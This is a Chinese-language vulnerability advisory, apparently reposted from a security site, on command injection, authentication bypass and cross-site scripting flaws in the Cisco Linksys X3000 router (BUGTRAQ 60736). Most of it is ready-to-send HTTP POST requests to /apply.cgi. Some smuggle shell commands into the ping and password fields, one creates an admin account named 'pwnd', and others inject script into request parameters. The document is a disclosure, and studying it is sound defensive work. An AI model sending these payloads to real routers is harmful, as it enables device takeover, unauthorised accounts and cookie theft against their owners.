Cisco Linksys X3000路由器多个安全漏洞

发布日期:2013-06-22
更新日期:2013-06-25

受影响系统:
Cisco Linksys X3000 Router
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60736
 
Cisco Linksys X3000是无线路由器产品。
 
Cisco Linksys X3000 1.0.03 build 001 及其他版本存在多个命令执行漏洞、安全绕过漏洞、多个跨站脚本执行漏洞,攻击者可利用这些漏洞执行任意命令、绕过某些安全限制、窃取cookie身份验证凭证、在用户会话上下文中执行未授权操作。
 
<*来源:Michael Messner (michae.messner@integralis.com)
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1. Command Injection:
 POST /apply.cgi HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer:
 Authorization: Basic XXX=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 194
 Connection: close
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_pin
 g&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%
 2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=
 
POST /apply.cgi HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer:
 Authorization: Basic XXX=
 Connection: close
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 444
 
command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUse
 rAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User
 _Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account
 _Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_
 Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`pi
 ng%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account
 _Group=admin
 
2. Cross site scripting:
 
Host:
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer:
 Authorization: Basic XXX=
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 156
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_pin
 g&action=&commit=0&nowait=1&ping_ip=1.1.1.1'><script>alert(1)</script>&p
 ing_size=32&ping_times=5&traceroute_ip=
 
POST /apply.cgi HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer:
 Authorization: Basic XXX=
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 103
 
submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&ma
 c=&if_name=&nowait=1&sortby=mac"%3balert(1)//
 
POST /apply.cgi HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer:
 Authorization: Basic XXX=
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 106
 
submit_button=WanMAC'%3balert(1)//&change_action=&submit_type=&action=Ap
 ply&wait_time=3&mac_clone_enable=0

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxszd.html